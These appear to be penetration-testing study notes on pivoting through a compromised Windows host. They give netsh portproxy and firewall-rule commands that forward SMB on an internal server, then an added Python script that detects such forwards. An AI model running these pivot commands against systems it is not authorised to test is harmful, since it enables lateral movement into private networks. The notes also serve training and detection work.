Netsh for Windows
A Windows host is compromised, with privileges escalated. In addition to being connected to the current network (10.11.0.x), it has an additional network interface that seems to be connected to a different network (192.168.1.x). In this internal subnet, we identify a Windows Server 2016 machine (192.168.1.110) that has TCP port 445 open. (There are certain requirements, which can be read in the OSCP material.)
We will use the netsh (interface) context to add an IPv4-to-IPv4 (v4tov4) proxy (portproxy) listening on 10.11.0.22 (listenaddress=10.11.0.22), port 4455 (listenport=4455), that will forward to the Windows 2016 Server (connectaddress=192.168.1.110) on port 445 (connectport=445):

    netsh interface portproxy add v4tov4 listenport=4455 listenaddress=10.11.0.22 connectport=445 connectaddress=192.168.1.110
The firewall will disallow inbound connections on TCP port 4455, which can be solved by adding a rule:

    netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=10.11.0.22 localport=4455 action=allow
Configure Samba on Linux (see Local port forwarding).
Check that the tunnel works:

    smbclient -L 10.11.0.22 --port=4455 --user=Administrator
It will show an error. This error prohibits us from listing workgroups, but it does not impact our ability to mount the share.
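
From the defender's side, a forward like the one above stays visible in the output of `netsh interface portproxy show all`. The following is an added example, not part of the original notes, that parses that output and flags relays which bridge subnets or expose sensitive ports; the sample output is constructed, and the sensitive-port list and /24 prefix are assumptions.

```python
import ipaddress
import re

# Constructed sample of `netsh interface portproxy show all` output (row 1 = rule from these notes).
SAMPLE_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
10.11.0.22      4455        192.168.1.110   445
127.0.0.1       8080        127.0.0.1       80
"""

ROW = re.compile(r"^\s*(\S+)\s+(\d+)\s+(\S+)\s+(\d+)\s*$")
SENSITIVE_PORTS = {22, 135, 139, 445, 3389, 5985, 5986}  # assumption: local policy
PREFIX = 24  # assumption: interfaces sit on /24 networks, as in the notes


def parse_portproxy(text):
    """Return one dict per forwarding rule; headers and separators are skipped."""
    rules = []
    for line in text.splitlines():
        if (m := ROW.match(line)):
            rules.append({"listen_addr": m[1], "listen_port": int(m[2]),
                          "connect_addr": m[3], "connect_port": int(m[4])})
    return rules


def review(rule):
    """Return the reasons a rule deserves investigation (empty list if none)."""
    try:
        listen = ipaddress.ip_address(rule["listen_addr"])
        target = ipaddress.ip_address(rule["connect_addr"])
    except ValueError:  # listenaddress=* or a hostname as connectaddress
        return ["wildcard or hostname address, resolve and check manually"]
    if listen.is_loopback and target.is_loopback:
        return []
    reasons = []
    net = ipaddress.ip_network(f"{listen}/{PREFIX}", strict=False)
    if target not in net:
        reasons.append(f"relays traffic from {net} to {target} on another subnet")
    if rule["connect_port"] in SENSITIVE_PORTS:
        reasons.append(f"exposes port {rule['connect_port']} via {listen}:{rule['listen_port']}")
    return reasons


if __name__ == "__main__":
    for r in parse_portproxy(SAMPLE_OUTPUT):
        print(r, review(r))
```

The same rules are stored under `HKLM\SYSTEM\CurrentControlSet\Services\PortProxy`, so a registry baseline comparison catches them as well.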